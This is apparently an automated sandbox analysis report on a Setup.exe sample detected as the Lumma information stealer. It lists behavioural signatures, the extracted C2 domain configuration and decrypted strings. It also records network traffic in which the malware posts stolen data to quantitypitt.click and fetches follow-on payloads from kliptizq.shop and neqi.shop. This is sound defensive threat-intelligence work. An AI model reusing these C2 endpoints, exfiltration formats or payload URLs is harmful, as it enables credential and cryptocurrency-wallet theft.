Windows Analysis Report
Setup.exe

Overview

General Information

Sample name: Setup.exe
Analysis ID: 1579539
MD5: 7a2ed58357c7dc7a63754e88af43a860
SHA1: 632930cbe696ee75e3445835258c77e8d27ab426
SHA256: 984d3e2de76f512c364247b280180d5bd7ed45b4d0c483e10a041943e08730d4
Tags: exeuser-aachum
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation Via Stdin
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection

barindex
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "necklacebudi.lat", "quantitypitt.click", "grannyejh.lat", "rapeflowwj.lat", "sustainskelet.lat", "crosshuaht.lat", "discokeyus.lat", "aspecteirs.lat"], "Build id": "hRjzG3--VIKA"}
Source: Setup.exe Virustotal: Detection: 7% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 94.3% probability
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String decryptor: rapeflowwj.lat
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String decryptor: crosshuaht.lat
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String decryptor: sustainskelet.lat
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String decryptor: aspecteirs.lat
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String decryptor: energyaffai.lat
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String decryptor: necklacebudi.lat
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String decryptor: discokeyus.lat
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String decryptor: grannyejh.lat
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String decryptor: quantitypitt.click
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp String decryptor: hRjzG3--VIKA
Source: Setup.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49775 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49794 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49799 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.186.189:443 -> 192.168.2.5:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.191.144:443 -> 192.168.2.5:49846 version: TLS 1.2
Source: Setup.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_00406301 FindFirstFileW,FindClose, 0_2_00406301
Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E0DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00E0DC54
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E1A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_00E1A087
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E1A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_00E1A1E2
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E0E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 12_2_00E0E472
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E1A570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 12_2_00E1A570
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E166DC FindFirstFileW,FindNextFileW,FindClose, 12_2_00E166DC
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DDC622 FindFirstFileExW, 12_2_00DDC622
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E173D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 12_2_00E173D4
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E17333 FindFirstFileW,FindClose, 12_2_00E17333
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E0D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00E0D921
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\124531\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\124531 Jump to behavior

Networking

barindex
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49766 -> 172.67.186.189:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49766 -> 172.67.186.189:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49775 -> 172.67.186.189:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49760 -> 172.67.186.189:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49760 -> 172.67.186.189:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49805 -> 172.67.186.189:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49816 -> 172.67.186.189:443
Source: Malware configuration extractor URLs: energyaffai.lat
Source: Malware configuration extractor URLs: necklacebudi.lat
Source: Malware configuration extractor URLs: quantitypitt.click
Source: Malware configuration extractor URLs: grannyejh.lat
Source: Malware configuration extractor URLs: rapeflowwj.lat
Source: Malware configuration extractor URLs: sustainskelet.lat
Source: Malware configuration extractor URLs: crosshuaht.lat
Source: Malware configuration extractor URLs: discokeyus.lat
Source: Malware configuration extractor URLs: aspecteirs.lat
Source: Joe Sandbox View IP Address: 194.58.112.174 194.58.112.174
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49766 -> 172.67.186.189:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49782 -> 172.67.186.189:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49788 -> 172.67.186.189:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49760 -> 172.67.186.189:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49805 -> 172.67.186.189:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49794 -> 172.67.186.189:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49775 -> 172.67.186.189:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49816 -> 172.67.186.189:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49823 -> 194.58.112.174:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49846 -> 172.67.191.144:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49799 -> 172.67.186.189:443
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: quantitypitt.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: quantitypitt.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=84ORA7LFCGFL3SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12810Host: quantitypitt.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LU8PHT2JI4GEGCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15052Host: quantitypitt.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5KF09NDH3SOHEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20536Host: quantitypitt.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=I8UMLDHAE16NIWXO8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 3805Host: quantitypitt.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FRIS9LZKT7T94LOZIN4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1253Host: quantitypitt.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FGTA4F6GQKZXWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 557508Host: quantitypitt.click
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: quantitypitt.click
Source: global traffic HTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliptizq.shop
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00E1D889 InternetReadFile,SetEvent,GetLastError,SetEvent, 12_2_00E1D889
Source: global traffic HTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: kliptizq.shop
Source: global traffic DNS traffic detected: DNS query: qebHBVmGmKNLRBMHyOJv.qebHBVmGmKNLRBMHyOJv
Source: global traffic DNS traffic detected: DNS query: quantitypitt.click
Source: global traffic DNS traffic detected: DNS query: neqi.shop
Source: global traffic DNS traffic detected: DNS query: kliptizq.shop
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: quantitypitt.click
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 22 Dec 2024 22:29:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SgdMo%2FlmiMzguYF8JZyhNWcTi89c88o1%2Bxx3atAqJuRbSNIAUJ3foY4pQ7w8AnjSO7rsN4Tps3gOs3BUEyHqAQQ7z6Ss0U8XRvTOlGWW%2B3PRN98EcFEj73DLNHJJMpRX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f638cc2ab095e5f-EWR
Source: Setup.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Setup.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Setup.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Setup.exe String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Setup.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Setup.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Setup.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Setup.exe String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: Setup.exe String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Setup.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: Setup.exe String found in binary or memory: http://ocsp.digicert.com0A
Source: Setup.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: Setup.exe String found in binary or memory: http://ocsp.digicert.com0X
Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Setup.exe String found in binary or memory: http://ocsps.ssl.com0
Source: powershell.exe, 00000010.00000002.2797712554.00000000047C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Distinction.9.dr, Designing.com.2.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Designing.com, 0000000C.00000003.2438306481.000000000529C000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000000.2130438108.0000000000E75000.00000002.00000001.01000000.00000006.sdmp, Designing.com.2.dr, Brunette.9.dr String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: Setup.exe String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: Designing.com, 0000000C.00000003.2533928879.00000000042C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000010.00000002.2797712554.00000000047C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Designing.com, 0000000C.00000003.2486767432.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2486595683.00000000042F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://kliptizq.shop/9
Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://kliptizq.shop/Z
Source: Designing.com, 0000000C.00000003.2787928688.0000000001A6F000.00000004.00000020.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txt
Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txtC
Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://kliptizq.shop/int_clp_ldr_sha.txtM
Source: Designing.com, 0000000C.00000002.2789884887.0000000001826000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://kliptizq.shop:443/int_clp_ldr_sha.txtge
Source: Designing.com, 0000000C.00000003.2788056081.000000000415E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://neqi.shop/
Source: Designing.com, 0000000C.00000003.2788056081.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000002.2789843944.0000000001807000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://neqi.shop/sdgjyut/psh.txt
Source: Designing.com, 0000000C.00000003.2788056081.000000000415E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://neqi.shop/sdgjyut/psh.txtk
Source: Designing.com, 0000000C.00000003.2535367064.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, Designing.com, 0000000C.00000003.2558937419.00000000041DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://quantitypitt.click/
Source: Designing.com, 0000000C.00000003.2558937419.000000000419A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://quantitypitt.click/%
